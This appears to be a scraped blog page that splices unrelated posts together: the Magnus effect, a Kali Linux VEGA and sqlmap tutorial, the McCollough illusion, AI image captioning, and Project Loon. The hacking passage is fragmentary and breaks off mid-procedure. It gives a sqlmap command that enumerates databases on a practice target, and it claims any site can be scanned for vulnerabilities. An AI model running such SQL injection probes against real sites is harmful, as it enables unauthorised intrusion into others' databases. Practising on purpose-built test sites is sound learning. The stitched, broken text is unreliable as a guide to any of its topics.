What is Magnus Effect ? What's its Use Beside Games.

If you love science, then you will love this article on Magnus Effect. It's amazing how can a basket ball fly in the air with the help of a backspin ? 

All thanks to Magnus Effect. 

 In the video, it shown what happens when you drop a basket ball from a 126 feet heigh dam in Australia. It falls on the ground straight (more or less) but when a you add a spinning on the basket ball, it fall after taking a fly horizontally in another direction.

Why ??

Because, Magnus Effect... An effect when applied on a rotatory object whether it's circle or cylindrical it flies, in the air.

As video says, "As the basketball picks up speed, air on the front side of the ball is going the same direction as its spin, and therefore it gets dragged along with the ball and deflected back. Air on the other side is moving opposite to the ball’s spin, so the flow separates from the ball instead of getting deflected. The result is that the ball pushes the air one way so the air applies and equal force on the ball the other way."

Magnus effect is widely used in games like soccer, football and etc. But what is real use ??

In the video, you'll also see a Rotor Ship, Flettner Rotor. Flettner Rotor uses the same concept of Magnus Effect. It has two cylinders, which spins and pushes the ship forward.

It's also used in airplanes also. So we're seeing at the future, with some promising Magnus Effect Applications.

- Set up Kali Linux in a Partition or in Virtual Machine.
- Open up : Application > Kali Linux > Web Application > Web Vulnerability Scanner > VEGA

// I hope you didn't have problem in doing that.

- So, see step by step after opening VEGA tool

After opening it - Go To Scan > Start New Scan

Enter the Web address, you can explore further if you like to otherwise just click on finish.

Remember, you can search for vulnerability on any webpage or site. Some sites also prizes you bounty on exploring bug and reporting to them ;)

The scan will take place. You can see the hierarchy in website view.

Paste it in terminal

 sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs  

here "--dbs" will enumerate the list of databases.

Could you see in the last line available databases :
[1] acuart
[2] information_schema

let's check the tables in 'acuart' -

Whoa!!

Spinning GIFs are Old Now, McCollough Effect will Change How Your Brain Works

Disclaimer : I've tried it, so the alteration performed by McCollough Effect over your brain normally lasts after one hour. If performed correctly,it may take upto 3 Months. So continue at your own risk. I've told you, It works :

This image is really crazy, means we all have seen much of illusion and spinning GIFs and magic illusions which basically overs after a simple rub with your knuckles over your eyes. But this one follows recursion. Founded in 1965 by Celeste McCollough, it contains some vertical and horizontal lines and makes our brain see colors where there is none.

Above image will describe you the part of our brain. If you want to experience this effect, I'm again warning you, take it at your own risk.

Step : 1 :: Stare at the image below (Test Image) for about 2 mins

Step : 2 :: Colored Induction Images

Now, you've to stare at below images alternatively. You have to stare at one image at center for few seconds and switch over another one and repeat the process for about 5 Min

Step : 3 :: 5 min over ? So, go back to first image and stare. Before, it was black and white but after the effect it'll be pinkish hue and light green.

For post, I've tried the image and felt the effect for about 30 mins, this gave me a little headache and rolling tears (because of staring) but it's interesting to know that my brain can do something, something which I can't control.

   Today here we are going to learn about a very amazing concept based on Artificial Intelligence at CS-BEANS , its about an Image Recognition Software that can make our computer systems to recognize an image or videos, so that our systems can  automatically  give a description  about the content of that image or video.
     As we people ,when see  something  we can summarize  the scene in few words.....like a caption or so. In the same way ,what if our systems are able to do the same ??
    Yeah its absolutely true ,  actually  researchers at Google and Stanford University ,  have fused  the concept of  Machine Learning  and  Neural Networks.

 Machine Learning  can be defined as a scientific discipline that mostly deals in  constructing and building such algorithms , that can enable a system to learn from the data we provide.
Some models are made based on inputs ,it makes the algorithms to operate , so that some sort of predictions can be generated or some decisions can be made , rather than just executing program instructions .
   So, a machine learning  system can automatically produce captions in order to describe an image ,the first time it sees them.The captions can be such accurate, that could seem like, have been  said by a person .

And now let's talk about how such model is made . For construction of  such a model , a combination of two different networks is used. Those are Convolutional Neural Network (CNN) and  Recurrent Neural Network (RNN). CNN is a kind of vision network and RNN is a language generating network system. So, the combination of them is enough to make a system to generate a natural language caption/description.

Project Loon, Thanks Google for Working Towards A Great Human Cause

Today's Discussion at CS-BEANS  is all about the "Project Loon", under Google Inc. So, your question will be what it is all about ?

Here Is Your Answer : 
All of us, not all actually but many thinks that we are all connected. But none of them know that 2/3 population of world is still not having internet connectivity. Google's Project Loon is a Balloon Project to provide free, fast and remote connectivity in those area where Internet connectivity is not available, we can say Rural Areas.

The Technology : Know what is behind it :
Project Loon Balloons float in the air, the stratosphere, more above than planes.
As we all know there are winds also and in multiple layers and each varies in its speed and direction, so to control Loon Balloons, it can shift itself between layers to go wherever it needed. We have to attached an antenna to our roof to get access to free internet by project loon network.
It all began in June, 2013. When a small group of pilot testers launched about 30 Loon Balloons in New Zealand's South Island. Since then it goes wider with more pilot testers. The motto of Project Loon is to establish a ring of uninterrupted connectivity around 40 southern parallels, so that all the testers could receive internet connectivity at that location.

How Loon Works:
So here is the algorithm which is followed by Loon Balloons. It helps them in determining the layer in which they have to move or the direction they have to travel.It forms a grat network by moving with the wind which can lead us to establish a large communication network.

Stratosphere -
•    Situated on the edge of space, between 10 km and 60 km in altitude.
•    Air pressure is 1% that at sea level.
•    This atmosphere doesn't gives significant protection from UV radiation.
•    Dramatic temperature swings, which can reach as low as -80°C

About Design:

•     These Balloon envelopes uses sheets of polyethylene plastic.
•     They15x12 meter when fully opened.
•     For certain conditions or unlikely events if a balloon drops, for those time it has a parachute attached at the top of the envelope.

How  Connection is made:
•    It provides connectivity to 40 kms area using LTE 4.0 Connectivity.
•    To implement these balloons and enable them to work with LTE Technology, Google asks to share network spectrum from telecommunication companies in order to provide internet connectivity to all devices which are equipped with LTE
